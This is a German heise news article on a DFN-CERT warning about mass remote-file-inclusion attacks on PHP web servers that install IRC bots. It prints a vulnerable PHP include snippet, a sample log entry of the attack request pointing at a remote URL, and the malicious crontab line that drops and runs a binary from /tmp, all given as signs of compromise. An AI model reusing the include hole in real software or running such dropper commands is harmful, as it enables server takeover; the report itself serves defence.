Newsletter heise-Bot heise-Bot Push Nachrichten Push Push-Nachrichten

DFN-CERT warnt vor Angriffen auf Webserver mit unsicheren PHP-Skripten

Das DFN-CERT registriert nach eigenen Angaben zurzeit massive Angriffe auf Webserver mit unsicheren PHP-Skripten, um IRC-Bots zu installieren.

In Pocket speichern vorlesen Druckansicht 371 Kommentare lesen
Lesezeit: 2 Min.
Von
  • Daniel Bachfeld

Das DFN-CERT und weitere deutsche CERTs (Computer Emergency Response Teams) registrieren nach eigenen Angaben zurzeit massive Angriffe auf Webserver mit unsicheren PHP-Skripten. In diese Skripte lässt sich weiterer Skript-Code einschleusen, der beispielsweise von einem anderem Webserver nachgeladen und ausgeführt wird. Laut Meldung finden sich auf bereits kompromittierten Systemen IRC-Bots, über die der Rechner fernsteuerbar ist und für weitere Angriffe missbraucht werden kann.

Betroffen sind Systeme, bei denen in der php.ini die Option allow_url_fopen = on gesetzt ist und sich ein Skript aufrufen lässt, das dynamisch Code nachlädt, beispielsweise so: 



  if (!isset($realm))
   {
        include "home.template";
   }
  else
   {
   include $realm ;
   }

Anstelle des Pfades zu einer lokalen Datei ist es so möglich, eine URL zu einer Datei auf einem Webserver anzugeben. Der include-Befehl lädt das Skript von dort aus nach und bindet ihn ein. Liegt der Exploit-Code bereit und ist ein verwundbares Skript gefunden, kann ein Angreifer über einen einzigen HTTP-Get-Request die Attacke starten.

Das DFN-CERT rät, derart konfigurierte Systeme nach Einbruchsspuren zu untersuchen. Sollte in den Logdateien des eigenen Webservers Einträge wie 

[28/Sep/2004:18:03:07 +0200] "GET 
/pfad/zu/einem/script.php?
variablenname=http://192.168.1.2:4213/
HTTP/1.0" 200 15183 "-" "Wget/1.8.1"

oder ähnliche vorhanden sein, ist das System eventuell bereits kompromittiert. Der IRC-Bot soll sich anhand eines Eintrages in der Crontab erkennen lassen: 

# "\177\105\114\10 [...] \000\37777777777" >
/tmp/tblihjauk ; chmod \700 /tmp/tblihjauk ; 
/tmp/tblihjauk x ; rm -f /tmp/tblihjauk34 
* * * * /bin/echo `crontab -l|grep '.\{666\}'
|sed 's/^./echo -e -n/'`|sh

Nach ersten Erkenntnissen wurden bislang nur Linux-Systeme kompromittiert, allerdings ist die Lücke prinzipiell auch unter anderen Betriebssystemen ausnutzbar.

Siehe dazu auch: (dab)

Spiele

nach oben
Alle Angebote
Newsletter heise-Bot heise-Bot Push Nachrichten Push Push-Nachrichten